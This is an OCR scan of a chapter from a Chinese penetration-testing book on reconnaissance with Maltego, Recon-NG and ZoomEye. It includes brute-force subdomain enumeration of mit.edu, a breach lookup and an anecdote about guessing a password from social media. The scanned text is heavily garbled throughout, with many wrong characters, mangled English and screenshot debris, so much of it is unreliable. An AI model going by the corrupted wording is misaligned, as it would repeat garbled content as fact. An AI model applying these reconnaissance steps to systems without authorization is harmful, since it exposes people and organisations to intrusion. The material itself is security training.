择 在 搜索 引 获 去 搜索 这 个 名 字 。 其 实 这 就 是 一 钦 对 目标 的 个 动 扫 手 。 最 
经 典 的 被 动 扫 描 技 术 其 实 要 数 “Google hack” 技 术 ， 但 是 这 种 技术 在 我 们 
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3.1 Maltego 的 使 用 oo 


有 时 我 们 在 进行 对 茶 个 网 站 的 墨盒 测试 时 ， 从 客户 那里 获得 的 信息 
只 有 一 个 域名 ， 例 如 www.testfire.net 〈 这 是 美国 IBM 公 司 提 供 的 一 个 专 
门 用 来 测试 的 网 站 ) ， 这 时 一 个 没有 经 验 的 渗透 测试 者 往往 会 无 从 下 
手 。 而 老练 的 渗透 测试 者 则 会 在 信息 收集 上 兹 费 整 个 测试 过 程 一 半 以 上 
的 时 | 则 。 不 过 在 目 动 化 的 信息 收集 工具 出 现 之 前 ， 每 个 渗透 测试 者 对 目 
标 进 行 信 息 收 集 的 方法 可 能 都 不 相同 。 


很 多 人 都 会 对 这 个 阶段 感到 奇怪 ， 作 为 黑客 ， 下 接 找 出 一 个 系统 的 
漏洞， 然后 黑 进 目标 系统 ， 很 多 电影 里 的 黑客 不 部 是 这 样 做 的 吗 ? 应 该 
说 这 些 粗 制 济 造 的 电影 中 的 确 是 有 这 样 的 情 方 ， 但 十 现 实 中 大 多 数 黑 客 
真 的 不 是 这 样 做 的 ， 当 然 渗透 测试 者 也 不 这 样 做 。 根 据 世 界 上 最 为 兰 名 
的 黑客 明文 : 米 特 尼 克 经 历 改 编 的 《黑客 通缉 令 》 中 ， 元 分 地 体现 了 在 
渗透 过 程 中 信息 收集 的 重要 性 。 万 外 ， 我 一 下 认为 这 部 电影 是 最 优秀 的 
社会 工程 学 教材 ， 没 有 之 一 。 


那么 信息 的 收集 要 从 哪 几 方面 来 下 手 呢 ? 以 目标 www.testfire.net 为 
例 ， 我 们 束 可 以 想方设法 来 获取 如 下 的 一 些 信 有 息 : 


10 目标 网 站 所 有 者 的 信息 ， 例 如 姓名 、 地 址 、 电 话 、 电 子 邮 件 
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邮箱 。 

3) 目标 网 站 用 户 的 社交 信息 ， 也 惑 是 该 网 站 工作 人 员 的 微 博 、 
QQ, WERI 〈 这 些 都 是 国内 渗透 测试 的 标准 ， 国 外 的 话 一 般 是 推 
特 、Youtube 之 类 ) 。 


这 些 信息 可 能 会 给 我 们 市 来 很 多 有 用 信息 ， 曾 经 有 墨客 收集 到 了 未 
国际 大 型 公司 一 个 工作 人 员 的 微 博 账号 ， 并 在 这 个 做 博 上 看 到 了 该 工作 
人 员 为 女友 送 上 的 生日 祝福 。 有 人 可 能 会 奇怪 这 有 什么 呢 ? EKE, X 
个 工作 人 员 在 办 公 系 统 中 设置 的 密码 恰恰 束 古 他 女友 的 生日 ， 现 在 你 明 
犁 信息 收集 的 重要 性 了 吧 ? 


但 是 互联 网 上 的 信息 数量 极为 上 硕大， 如 来 想 手 工地 从 其 中 找 出 有 用 
的 信息 ， 无 异 于 大 海 捞 针 ， 所 以 我 们 最 好 能 采用 一 种 自动 化 的 信息 收集 
LR. 
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B 思 收 集 目标 的 信息 。 下 面 我 们 束 以 一 个 实例 来 尖 示 这 个 工具 的 使 


局 动 Maltogo 的 方法 很 简单 ，Kali Linux 2 中 已 经 安装 了 Maltego， 我 
们 只 需要 依次 单 击 Applications/01-Information Gathering/maltegoce 就 可 以 
打开 这 个 工具 ， 如 图 3-1 所 示 。 


03 - Web Applica nalysis 
04 - Database Assessment 
05 - Password Attacks 
06 - Wireless Attacks 
07 - Reverse Engineering 
08 - Exploitation Tools 


09 - Sniffing & Spoofing 





图 3-1 Applications"? cH z/)Maltego 
Maltego 局 动 过 程 的 界面 如 图 3-2 所 示 。 





图 3-2 ”Maltego 的 启动 过 程 


Maltego 成 功 局 动 之 后 ， 会 出 现 一 个 欢迎 界面 ， FÉ E; "Next? B[ n], 如 
图 3-3 所 示 。 


Welcome to Maltego! 


. Login 


Welcome to Maltego! 
. Login result 


This wizard will guide you through the steps of setting up your 


4. Select Transform Seeds Maltego Client for first use. 


. Install Transforms We hope that you enjoy using our product as much as we enjoy 
building it! 


Please note that the Community Edition is intended for 
non-commercial use only! 





图 3-3 ”Maltego 的 欢迎 界面 


第 一 次 使 用 Maltego 的 话 ， 需 要 注册 一 个 账户 ， 单 击 “register here” 会 
跳 转 到 为 外 一 个 页 面 ， 如 图 3-4 所 示 。 


Enter your details below to log in to the Maltego Community Server 
3. Login result Or if you have not done so yet, register here 


4. Select Transform Seeds 


Login 
5. Install Transforms V EmalbAddreva 


* Solve captcha 





图 3-4 Maltego 的 登录 界面 
这 个 注册 是 免费 的 ， 需 要 注意 的 是 如 果 我 们 在 国内 注册 的 时 候 ， 有 
时 会 看 不 到 这 个 “进行 人 机 身份 验证 ”的 窗口 ， 这 时 是 无 法 完成 注册 的 。 
MaltegoH13:/1 77 ri 4t ÉS3-5 Brzg - 


Welcome to the Maltego community edition page, here you will be able to register 
an account that you can use with the latest community edition of Maltego! 


REGISTER AN ACCOUNT 


国 进行 人 机 身份 验证 





图 3-5 ”Maltego 的 注册 界面 
注册 成 功 之 后 ， 使 用 注册 的 用 尸 名 登录 即 可 ， 如 图 3-6 所 示 。 


Email address  lihuafeng1999(163.com 


Your API key is valid until July 16, 2017 at 12:00:00 AM EDT 





图 3-6 ”成 功 登 录 Maltego 


接 下 来 要 选择 我 们 使 用 Maltego 的 方式 ， 这 里 一 共有 两 种 选 
择 , “Maltego public servers” 是 官方 服务 器 ， 如 采 你 拥有 目 己 的 Maltego 
服务 硕 〈 在 官方 网 站 可 以 购买 ) ， 也 可 以 填 与 目 己 Maltego 服 务 硕 的 地 
址 ， 如 图 3-7 所 示 。 





图 3-7 ”选择 Maltego 使 用 的 服务 器 


这 里 我 们 使 用 默认 的 “Maltego public servers” 即 可 。 接 下 来 我 们 设置 
使 用 Maltego 的 目标 ， 先 建立 一 个 空 的 项 目 ， 选 择 “Open a blank graph 
and let me play around”， 如 图 3-8 所 示 。 


(*) Open a blank graph and let me play around 


e Open an example graph 


O Go away, | have done this before! 





图 3-8 选择 创建 一 个 新 的 项 目 


打开 的 Maltego 工 作 界 面 分 成 3 个 部 分 ， 了 最 上 方 是 荣 单 栏 ， 这 里 面包 
含 了 所 有 的 功能 ， 左 侧 Entity Palette 包 含 了 所 有 的 对 象 〈 例 如 设备 、 域 
名 、IP 地 址 等 ) ， 石 侧 是 收集 到 的 信息 ， 这 个 界面 如 图 3-9 所 示 。 


ME Investigate View. Entities. Collections ransforms achines Collaboration Import | Export Windows 


Select None Add Children Add Path Select Neighbors 


Clear Graph Number of Results rH na $$ Select A Add Parents Add Neighbors Select Children 
ut r= S A ^ A ) 
Hu Doo i 1 Quick Find in Entity 
12 50 255 10l Find Files Selection * 


Delete 
Device 


iomous System 


DNS Name 





Domain 


Freeze 
| 


C 


图 3-9 ”Maltego 的 工作 界面 


Maltego 的 使 用 是 目 动 化 的 ， 你 只 需要 提供 要 进行 调查 的 内 容 ， 例 
如 这 里 我 们 要 调查 的 是 www.testfire.net 这 个 域名 ， 那 么 我 们 束 可 以 在 左 
侧 的 Entity Palette 列 表 的 Infarastructure 分 其中 选择 Domain， 并 拖 动 
Domain 到 右 侧 的 空 昌 区 中 ， 如 图 3-10 所 示 。 





图 3-10 ”在 Maltego 中 添加 一 个 节点 


在 空白 区 将 看 到 一 个 名 为 paterva.com 的 域 对 象 ， 双 击 这 个 对 象 ， 将 
其 修改 为 testfire.net。 然 后 我 们 可 以 有 多 种 调查 的 方式 ， 这 里 面 选择 一 
种 最 为 常用 的 方式 ， 也 束 是 Maltego 提 供 的 自动 化 信息 收集 ， 在 选择 了 
宇 白 区 的 testfire.net 之 后 ， 然 后 单 击 最 左 侧 的 Run View 按 钮 ， 在 切换 出 
来 的 Machines 采 蛙 中 提供 了 Maltego 提 供 的 几 种 比较 经 典 的 信息 收集 方 
式 ， 这 里 最 为 常用 的 是 Footprint 系 列 ， 其 中 后 面 的 数字 越 大 ， 调 但 的 深 
上 度 也 束 越 大 ， 这 里 我 们 以 其 中 的 Footprint L1 为 例 ， 如 图 3-11 所 示 。 
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图 3-11 fi Hj*Footprint L1" 


选中 了 Footprint LIZ 5, Eir li rantz£H BU n], cS SUB S SR 
A E A 
7IR12 NT R o 


testfire. net demo. testfire. net ftp.testfire.niet www.testfire. niet 


65.61.137.117 


T 


65.61.137.0-55.61.137.255 


图 3-12 ”收集 到 的 结果 


在 这 次 信息 的 收集 过 程 中 ， 我 们 找到 T testfire. net 的 多 个 子 域名 ， 
例如 demo.testfire. net、ftp.testfire.net 等 等 ， 我 们 还 知道 了 这 个 域名 对 应 
的 卫 为 65.61.137.117。 如 末 你 想 获 得 更 多 信息 的 话 ， 比 如 知道 
65.61.137.0 一 65.61.137.255 的 所 处 的 地 理 位置 ， 也 可 以 在 对 应 节点 上 面 
早 击 鼠标 右键 ， 然 后 在 弹出 的 右键 灯 早 中 选择 “To Location[city， 
country]”， 束 可 以 对 这 个 地 址 定位 ， 如 图 3-13 上 所 示 。 


To AS number 
To DNS Names in netblock [Reverse DNS] 


To Entities (NER [Alchemy and OpencCalais] wia whois 


=] 
m. 
0) 
2 
加 
ma 1] 
oO 
mi 
3 
T 


To IP addresses [Found in Netblock] 

To Location [city, country] 

To Location [country] 

To Netblocks [Cuts Netblock into smaller ones] 


CP ea EG 





图 3-13 ”使 用 To Location[city, country Ji 47 XE 4. 


执行 完 这 个 操作 之 后 ， 束 可 以 获得 以 地 标 形式 显示 的 该 IP 地 址 的 位 
置信 息 , 如 图 3- 14 所 示 。 


Se 


BSBblIJg3 rl 


9 





33070 san Antonio, United States 





图 3-14 ”定位 到 的 信息 


由 于 testfire.net 只 是 一 个 测试 用 的 网 站 ， 不 同 于 我 们 真实 世界 的 网 
站 ， 而 且 我 们 采用 了 深度 不 大 的 Footprint L1 收 集 模式 ， 所 以 找到 的 信息 
量 并 不 大 。 而 在 真实 的 渗透 测试 中 获取 到 的 信息 量 往往 是 相当 大 的 。 


3.2 ”使 用 Recon-NG 进 行 信 息 收 集 


相 比 起 Maltego，Recon-NG 在 国内 的 资料 并 不 多 。 但 是 Recon-NG 框 
染 确 实 是 一 球 功 能 极为 强大 的 信息 收集 和 网 络 侦 察 工具 。 使 用 Recon- 
NG 我 人 TOP LA ELS SE $83 SE EETPIMR IEEE. LABE 
提供 了 一 些 和 被动 扫描 的 功能 ， 也 提供 了 主动 扫 摘 的 功能 


3.2.1 Recon-NG 的 基本 用 法 


这 蒜 工 具 是 一 和 亚 训 音 驱动 的 工具 ， 所 以 即使 是 初学 者 也 很 容易 上 
手 ， 和 下面 我 们 来 介绍 一 下 Recon-NG 的 使 用 方法 。 和 Kali 中 的 所 有 工具 一 
样 ， 局 动 Recon-NG 的 方法 有 两 种 。 


1) 在 上 方 京 单 中 依次 单 击 “Application”/“Inforemation 
Gathering”“Recon-NG”， 如 图 3-15 所 示 。 


Favorites 


01 - Information Gathering 


02 - Vulnerability Analysis 


03 - Web Application Analysis 
04 - Database Assessment 
05 - Password Attacks 

06 - Wireless Attacks 

07 - Reverse Engineering 

08 - Exploitation Tools 

09 - Sniffing & Spoofing 

10 - Post Exploitation 

11 - Forensics 

12 - Reporting Tools 

13 - Social Engineering Tools 
14 - System Services 

Usual applications 


Wine 


图 3-15 





dmitry 
dnmap-clie... 
dnmap-ser... 
ike-scan 
maltegoce 
netdiscover 
nmap 

pof 
recon-ng 
sparta 


zenmap 


TE Application"? JH Z/) Recon-NG 


2) 男 一 种 方法 就 是 打开 一 个 终 疾 ， 然 后 直接 输入 命令 “Tecon-ng”: 


root@kali:~# recon-ng 


Recon-NG 局 动 之 后 的 界面 如 图 3-16 所 示 。 


root@kali: ~ 


File Edit View Search Terminal Help 


八 
ENN X 
"AWO ATI SA EEATA 
FN NN 
ANACK HIEES NA UT 
www.blackhillsinfosec.com 


Sponsored by... 





[recon-ng] [default] > J 


图 3-16 ”局 动 之 后 的 Recon-NG 寞 面 


如 果 和 需要 人 查看 Recon-NG 中 可 以 使 用 的 命令 束 可 以 输入 “help”， 如 图 
3-17 上 所 示 。 


root@kali: ~ ooo 
File Edit View Search Terminal Help 


Adds records to the database 
Exits the current context 

Deletes records from the database 
Exits the framework 

Displays this menu 

Manages framework API keys 

Loads specified module 

Starts a Python Debugger session 
Queries the database 

Records commands to a resource file 
Reloads all modules 

Executes commands from a resource file 
Searches available modules 

Sets module options 

Executes shell commands 

Shows various framework items 
Manages workspace snapshots 
Spools output to a file 

Unsets module options 

Loads specified module 

Manages workspaces 





[recon-ng] [default] > J 


儿 3-17 ”Recon-NG 的 帮助 文件 
下 面 给 出 了 每 条 命令 的 作用 。 


add: 问 数 据 库 添加 一 条 记录 。 
back: 返回 到 上 一 级 。 

delete: 从 数据 库 删 际 一 条 记录 。 
exit: 退出 Recon-NG。 

help: 显示 帮助 信息 。 

keys: API. 

load: 载 入 指定 模块 。 

pdb: 打开 Python 调试 。 

query: frigus. 

record: 将 命令 你 存 为 资源 文件 。 
reload: 重新 载 入 所 有 模块 。 
resource: 执行 一 个 资源 文件 。 
search: 搜索 可 用 的 模块 。 

set: 设置 参数 的 值 。 

shell: 执行 操作 系统 的 命令 。 
show: 显示 各 种 框架 的 条 目 。 
snapshots: 创建 一 个 快照 。 
spool: 将 结果 输出 到 一 个 文件 。 
unset: 重 置 参数 全。 


e use: 载 入 指定 模块 。 
e workspaces: 管理 工作 区 。 


这 里 面 按照 英文 字母 表 的 顺序 列 出 了 21 条 可 以 使 用 的 命令 ， 我 们 先 
来 得 看 其 中 的 Show 命令， 这 条 命令 是 用 来 得 看 各 种 信息 的 ， 现 在 我 们 在 


命令 行 中 输入 的 “<show“， 系 统 就 会 给 出 show 命 令 后 面 可 以 使 用 的 参数 ， 
如 图 3-18 所 示 。 


pea din: El 
fr 


us framewor 3 iras 


Usage: show [banner |companies |contacts | credentials |dashboard|domains hosts | keys | 
leaks | Locations modules |netblocks|options|ports|profiles|pushpins|repositories|s 
chema | vulnerabilities |workspaces] 





3-18 ”Recon-NG 的 Show 命令 


这 里 我 们 使 用 show 命 令 和 参数 modules 来 查看 Recon-NG 中 所 有 可 以 
使 用 的 模块 ， 如 图 3-19 所 示 。 


root@kali: ~ o o o 
File Edit View Search Terminal Help 
[recon-ng][default] » show modules 


Discovery 


discovery/info disclosure/cache snoop 
discovery/info disclosure/interesting files 


Exploitation 


exploitation/injection/command injector 
exploitation/injection/xpath bruter 


Import 


import/csv file 
import/list 


recon/companies-contacts/bing linkedin cache 
recon/companies-contacts/jigsaw/point usage 
recon/companies-contacts/jigsaw/purchase contact 
recon/companies-contacts/jigsaw/search contacts 
recon/companies-contacts/linkedin auth 





图 3-19 ”使 用 “show modules” 查 看 可 以 使 用 的 模块 


我 们 现在 使 用 的 Recon-NG 包 含 了 5 个 种 类 一 共 90 个 模块 ， 这 些 模块 

有 些 古 进行 被 动 扫 插 的 ， 它 们 可 以 在 目标 完全 不 知情 的 情况 下 进行 ， 而 

E Bac PER 有 的， 它们 会 回 目 标 友 壕 探 针 ， 甚 至 对 目标 友 
ul o 


由 于 Recon-NG 中 模块 数量 众多 ， 为 了 方便 使 用 者 可 以 快速 了 解 模 
块 的 用 偿 ， 新 版 的 Recon-NG 在 为 模块 命令 的 时 候 来 用 了 分 层 式 〈 主 要 
是 三 层 式 ) 的 命名 方法 。 


例如 ， 以 recon/domains-hosts/bing_domain_Web 模 块 为 例 ， 这 个 模 
块 一 共 分 成 了 3 个 部 分 。 


e 最 有 前面 的 是 模块 类 型 ， 这 个 模块 的 类 型 为 recon， 这 种 类 型 的 模块 
是 用 来 对 目标 进行 侦查 的 。 

e 中 国 的 是 domains-hosts 给 出 模块 的 工作 目标 ， 这 个 模块 的 工作 目标 
束 古 domains-hosts， 从 名 字 上 看 出 来 工作 目标 古 域 名 。 

e 最 后 面 给 出 使 用 的 技术 ， 例 如 这 个 模块 bing_domain_Web 束 是 借助 
微软 的 bing 对 一 个 域名 的 子 域名 进行 检查 。 


3.2.2 ”Recon-NG 的 使 用 实例 


那么 在 知道 一 个 模块 的 名 字 和 大 致 用 途 之 后 ， 如 何 使 用 这 个 模块 
呢 ? 如 果 你 在 阅读 本 书 之 前 有 过 Metasploit 的 使 用 经 历 的 话 ， 那 么 对 此 
就 不 会 陌生 。 和 Metasploit 一 样 ，Recon-NG 并 不 是 简单 地 将 这 些 模块 组 
合 到 一 起 ， 而 是 将 这 些 模块 的 使 用 方法 进行 了 统一 ， 这 样 你 束 无 需 一 次 
又 一 次 地 去 熟悉 每 一 个 模块 了 。 虽 然 上 面 介 绍 了 21 个 命令 ， 但 是 在 
Recon-NG 模 块 中 常用 的 主要 是 use、show、set、run 这 几 个 命令 。 


下 面 我 们 来 看 一 个 Recon-NG 使 用 的 实例 。 


这 里 我 们 以 recon/domains-hosts/brute hosts 为 例 ， 这 个 模块 可 以 根据 
你 给 出 的 一 个 域名 列 出 它 的 所 有 子 域名 ， 原 理 是 又 力 穷 解 ， 就 是 利用 字 
典 文 件 生 成 各 种 域名 ， 然 后 对 这 些 域名 发 出 请 求 ， 如 果 得 到 回应 的 话 ， 
则 确认 该 域 名 存在 。 


使 用 的 方法 如 下 : 


1) 使 用 use 命 令 启 动 recon/domains-hosts/brute hosts， 如 图 3-20 上 所 


———A 


ZJN o 









[recon-ng] [default] 
[recon-ng] [default] [ 


图 3-20 ”使 用 use 命 令 局 动 


2) 接 下 来 使 用 “show options” 来 查看 这 个 模块 中 所 需要 使 用 的 参 
数 ， 如 图 3-21 所 示 。 






> use recon/domains-hosts/brute hosts 
brute hosts] > J 








SOURCE default 


yes 
WORDLIST /usr/share/recon-ng/data/hostnames .tx ec 


图 3-21 得 看 需要 议 症 的 参数 


3) 这 个 模块 只 需要 两 个 参数 SOURCE 和 WORDLIST，SOURCE 参 
数 怠 是 我 们 要 扫 摘 的 域名 ， 如 果 我 们 想 奏 看 肪 省 理工 学 院 的 域名 mit.edu 
下 面 还 包含 了 哪些 域名 的 话 ， 束 可 以 使 用 命令 “set SOURCE mit.edu". 

而 WORDLIST 古 用 来 穷 举 的 字典 文件 ， 这 个 文件 已 经 有 了 默认 值 ， 这 里 
我 们 不 做 修改 ， 如 图 3-22 所 示 。 


bela st][brute hosts] > set SOURCE mit.edu 


19g] [te st][b ute hosts] » show options 


yes 
ata/hostnames .tx es 


图 3-22 ”为 参数 赋 信 


4) 好 了 ， 束 这 样 我 们 已 经 完成 了 对 模块 的 设置 ， 现 在 可 以 开始 对 
目标 进行 扫 朱 了 ， 执 行 模 顽 的 命令 为 "run”， 执 行 的 过 程 如 图 3-23 所 示 。 


root@kali: ~ 0o09 





File Edit View Search Terminal Help 
lrecon-ngjltestjlbrute hosts] > run 
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图 3-23 ”对 目标 的 域名 进行 穷 举 


该 模块 执行 完毕 ， 得 到 了 总 共 1070 个 结果 “(964 个 有 效 ) ， 也 就 是 
一 共 发 现 mit.edu 存 在 1070 个 (964 个 有 效 ) 子 域名 ， 如 图 3-24 所 示 。 


下 面 用 框 线 标识 出 来 的 就 是 友 现 的 子 域名 ， 如 图 3-25 所 示 。 


18970 total (964 new) hosts found. 
[recon-ng][test][brute hosts] > Bj 





Kl3-24 HFE f 10707 25 R 


yellow.mit.edu => (A) 18.74.1.181 
xmail.mit.edu => Mo record found. 
vt.mit.edu => (A) EIEE RET: 

[host] yellow.mit.edu (18.74.1.181) 
[host] yt.mit.edu (18.93.90.58) 
EUER UR AEST LEES NO recora touna. 
xp.mit.edu => No record found. 


图 3-25 ”和 域名 对 应 的 IP 地 址 


可 是 在 扫描 过 程 中 显示 的 内 容 ， 既 有 yellow.mit.edu 这 种 存在 的 子 域 
名 ， 也 有 失败 的 xp.mit.edu 这 种 不 存在 的 子 域名 ， 可 以 使 用 show hosts 命 
令 来 僵 看 找到 的 主机 ， 如 图 3-26 所 示 。 








图 3-26” 列 出 的 结果 


如 条 你 和 布 望 将 这 次 扫描 的 结果 保存 起 来 的 话 ， 葡 可 以 使 用 reporting 
中 的 模块 ， 现 在 我 们 使 用 back 命 令 退 出 当前 模块 ， 注 意 并 不 是 退出 
Recon-NG. 


[recon-ng][test][brute hosts] »back 


然后 执行 “show modules" mMm 4. 


[recon-ng][test] > show modules 


这 里 我 们 仅仅 一 看 生成 报告 用 的 reporting 类 型 的 模块 ， 如 图 3-27 所 


Reporting 


reporting/csv 
reporting/html 
reporting/json 
aget AE 


reporting/proxifier 
reporting/pushpin 
reporting/xlsx 
reporting/xml 


[recon-ng][test] > B 





图 3-27 ”reporting 类 型 的 模块 
这 个 reporting 类 型 的 模块 的 作用 是 提供 了 输出 各 种 格式 的 报告 。 


例如 ， 这 里 我 们 选择 输出 一 个 xml 格 式 的 报告 ， 那 么 就 可 以 使 用 
reporting/xml 模 块 : 


[recon-ng][test] »usereporting/xml 
[recon-ng][test] »use reporting/xml 


[recon-ng][test][xml] > run 
[*] 964 records added to '/root/.recon-ng/workspaces/test/results.xml'. 





其 中 的 964 个 结果 都 写 入 了 /root/.recon-ng/workspaces/test/results.xml 
文件 中 ， 需 要 注意 的 一 扣 ， 这 是 一 个 隐 忠 的 文件 来 ， 所 以 无 法 下 接济 
咏 。 但 是 我 们 可 以 使 用 cat 命 令 来 查看 这 个 文件 。 


root@kali:~# cat /root/.recon-ng/workspaces/test/results.xml 


e AAPPEAR F: 





«?xml version="1.0" ?> 


<root> 

«credentials type="list"/> 

«hosts type="list"> 

«item type-"dict"» 

«country type-z"null"/» 

«region type-"null"/» 

«longitude type-z"null"/» 

«host type-z"str'"»abc.mit.edu«/host» 
«module type= str >brute hosts«/module» 


«latitude type-"null"/» 
«ip address type-z"str"»18.9.61.41«/ip address» 
</item> 





e 这 里 省 略 了 其 他 的 记录 。 
另外 ， 也 可 以 使 用 需要 的 软件 来 打开 这 个 XML 文件 。 
3.2.3 f HiRecon-NG/A45 MIF E Z yE 8E 


下 面 再 介绍 一 个 recon/contacts-credentials/hibp_paste 模 块 ， 这 是 一 个 
很 有 趣 的 模块， 其 实 这 个 模块 就 是 利用 了 大 名 鼎 具 
的 “haveibeenpwned” 提 供 的 服务 ， 它 可 以 帮助 你 快速 检测 茶 一 项 信息 是 
售 已 经 泄漏 ， 比 如 说 你 可 以 检测 是 个 你 的 个 人 信息 已 经 浊 漏 ， 2 
我 来 检查 一 下 自己 的 电子 邮箱 lihuafeng1999@163.com 的 密码 是 否 已 经 汇 
源 ， 束 可 以 使 用 这 个 模块 : 


[recon-ng|[default| > use recon/contacts-credentials/hibp paste 
[recon-ng][default|[hibp paste] > show options 
Current Value Required Description 


DOWNLOAD True download pastes 


SOURCE | admin()9testfire.net yes source of input (see 'show info 
' for details) 
[recon-ng][default|[hibp paste] > set source lihuafeng1999(0163.com 
SOURCE => lihuafeng1999(0163.com 
[recon-ng][default|[hibp paste] > run 
[*] lihuafengi19990163.com => Not Found. 





这 里 面 提 到 的 “Haveibeenpwned” 服 务 是 由 软件 架构 师 兼 做 软 开 发 安 
EmA PME ZK Troy HuntGJ££, IANA R S T gus E IE 
REKS ER. IER] S dr] EA EXT Pd vd Er FT ERE GZA 
ee ， 然 后 广 网 站 会 确定 这 个 地 址 是 人 否 在 泄露 账号 信息 数据 


3.2.4 ”Recon-NG 中 的 API Keys? fF 


eg ol cn ed 它 的 很 多 功能 来 和 目 于 互联 网 上 
的 一 些 工 具 ， 例 如 Google、Bing 等 工具 。 在 使 用 这 些 功 能 的 时 候 有 时 会 


要 添加 该 工具 提供 的 API Keys， 使 用 keys 命 令 束 可 以 对 当前 Recon-NG 
的 API Keys 进 行 租 看 、 琴 加 和 删除 。 对 于 keys 命 令 的 具体 内 容 ， 我 们 
可 以 使 用 “keys help” 来 查看 。 


[recon-ng][test] »keys help 
Manages framework API keys 
Usage: keys [list ]|add|delete] 


keys 后 面 可 以 使 用 的 参数 包括 list、add 和 delete， 其 中 list 是 列 出 当前 
的 所 有 API Keys，add 是 添加 API Keys，delete 是 删除 API Keys. 


3.3 ”神奇 的 搜索 引擎 ZoomEye 


现在 几乎 所 有 联网 的 设备 都 成 为 了 可 能 被 攻击 的 目标 ， 但 是 很 多 人 
邵 搞 不 异 攻 击 者 是 起 么 在 互联 网 上 找到 这 些 设备 呢 ? 例 如 现在 传 得 沸 沸 
扬扬 的 “摄像 头 ” 入 侵 事 件 ， 攻 击 者 是 如 何 找到 这 些 摄像 头 设备 的 呢 ? 作 
为 一 个 网 络 安全 渗透 测试 人 员 ， 我 们 现在 所 测试 的 设备 信息 赴任 也 已 经 
在 互联 网 上 被 公开 了 呢 ? 


我 认为 最 好 的 工具 就 是 Shodan 和 ZoomEye， 它 们 都 是 网 络 安全 人 员 
十 分 喜爱 的 搜索 引擎 。 不 同 于 Google 的 是 ， 诸 如 Baidu 等 用 于 搜索 网 站 
页 面 的 引擎 ， 它 们 的 目的 是 搜索 网 络 上 指定 类 型 的 设备 。 利 用 Shodan 和 
ZoomEye， 你 可 以 轻松 地 完成 一 些 以 前 看 起 来 几乎 是 不 可 能 完成 的 任 
务 ， 例 如 轻松 地 找 出 位 于 非洲 的 一 些 没 有 设置 口令 的 服务 问 。 因 此 ， 在 
外 ，Shodan 也 被 称 作 是 “最 可 怕 的 搜索 引擎 ”。 


Shodan 和 ZoomEye 的 使 用 方法 都 十 分 简单 ， 它 们 都 提供 了 图 形 化 的 
操作 界面 ， 不 过 如 果 正 人 确 地 使 用 这 两 个 工具 ， 我 们 还 必须 掌握 “关键 
词 ” 的 用 法 。 这 个 “天 键 词 ” 的 用 法 其 实 和 Google、Baidu 十 分 相似 ， 只 要 
你 能 正确 地 使 用 这 些 关 键 词 ， 束 可 以 快速 在 网 络 上 找到 那些 你 所 需要 的 


设备 。 


当然 Shodan 和 ZoomEye 可 以 为 各 类 人 员 提 供 便利 ， 作 为 渗透 测试 者 
的 我 们 同样 可 以 使 用 Shodan 和 ZoomEye 来 检查 在 自身 网 络 中 是 否 存在 不 
安全 配置 的 设备 。 其 中 ，Shodan 的 历史 更 为 久远 ， 因 此 你 可 以 很 轻松 地 
在 互联 网 上 找到 有 关 它 的 学 习 资料 ， 这 里 我 们 不 再 详细 介绍 ， 本 节 的 重 
点 束 放 在 ZoomEye 这 球 国 内 的 优秀 工具 上 。 


随 看 互联 网 的 快速 肥 展 ， 连 接 到 整个 网 络 上 的 不 再 只 有 计算 机 ， 各 
种 各 样 的 设备 部 出 现在 了 这 个 时 代 的 大 舞台 上 。 路 由 如 、 交 换 机 、 电 话 


系统 、 网 络 打 印 机 、 工 业 控 制 设备 、 崩 入 式 系统 、 安 保 设备 等 都 可 以 通 
过 互联 网 进行 访问 ， 一 方面 为 使 用 者 市 来 了 极 大 的 便利 ， 但 为 一 方面 ， 
这 些 设备 部 雄 露 在 互联 网 上 ， 也 市 来 了 极 大 的 安全 隐患 。 


除了 一 些 确实 需要 连 入 互联 网 的 设备 《例如 网 络 摄像 头 ) 之 外 ， 我 
们 经 名 会 及 现 很 多 时 候 ， 用 户 并 不 是 故意 将 设备 连接 到 互联 网 上 的 。 一 
些 经 验 不 够 丰 亢 的 工作 人 员 在 对 这 些 设备 进行 配置 的 时 候 ， 往 往 是 在 不 
经 意 间 完成 了 到 互联 网 的 连接 。 后 果 更 为 严 午 的 是 ， 这 些 用 户 经 常会 使 
用 系统 默认 的 用 尸 名 和 密码， 甚至 有 些 设备 的 密码 为 宇 。 这 种 设备 一 旦 
RARI, Ja RRAN 


3.3.1 ZoomEye 的 基本 用 法 

ZoomEye (*PPBZ HR") 是 由 国内 的 知道 创 衬 公司 开 及 并 提供 服务 
的 ， 它 的 定位 是 网 络 空 间 搜索 引擎 ， 思 想 上 借鉴 了 Shodan， 但 是 将 侧重 
点 放 在 了 Web 层 面 。 

下 面 我 们 先 来 查看 ZoomEye 的 使 用 方法 。 


首先 ， 我 们 先 来 访问 ZoomEye 的 在 线 网 站 ， 地 址 为 
https://www.zoomeye.org/， 打 开 这 个 地 址 之 后 的 页 面 如 图 3-28 所 示 。 





图 3-28 ”ZoomEye 的 在 线 网 站 


如 末 想 要 正 审 使 用 ZoomEye 工 其 的 功能 ， 我 们 需要 在 这 个 网 站 注册 
一 个 账户 。 这 个 注册 是 十 分 简单 ， 而 且 是 免费 的 。 按 照 如 图 3-29 所 未 的 
界面 进行 注册 ， 注 册 之 后 ， 还 可 以 使 用 ZoomEye 工 具 提 供 的 一 些 附加 功 
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注册 Telnet404 通行 证 


Izio 


AA Hofer up 





社交 账户 登录 y 4$ 


«4 Fe iHe Telnet404 用 户 上 服务 条 就 和 PS: 


FARGE 





图 3-29 注册 ZoomEye 


注册 的 过 程 很 简单 ， 只 需要 项 写 你 的 手机 号 但 、 用 户 名 、 电 子 邮箱 
地 址 和 密码 。 手 机 号 人 码 填写 完成 之 后 ，ZoomEye 会 同 你 注册 的 手机 号 码 
中 友 送 一 条 短 信 ， 盾 写 短 信 中 的 验证 码 后 ， 单 击 “ 立 即 注册 ”， 你 就 可 以 
使 用 这 个 账户 了 。 


现在 我 们 可 以 使 用 ZoomEye 了 ， 首 先 先 来 咎 看 一 下 其 中 最 基本 的 功 
能 ， 例 如 我 们 使 用 ZoomEye 在 全 世界 范围 内 奏 找 一 下 Cisco 的 设备 ， 具 
体 的 操作 方法 融 是 在 ZoomEye 的 搜索 栏 中 输入 “cisco”( 见 图 3-30) 。 





3-30 ”使 用 ZoomEye 搜 索 设 备 


然后 单 击 回 千 键 ， 如 图 3-31 所 示 ， 我 们 可 以 得 找到 所 有 连接 到 互联 
网 上 的 Cisco 设 备 《〈《 出 于 隐私 和 考虑， 本 书 中 隐藏 了 所 有 设备 下地 址 的 前 羊 


部 分 ) 。 


uu B27.124.108.250 


图 3-31 找到 的 Cisco 设 备 


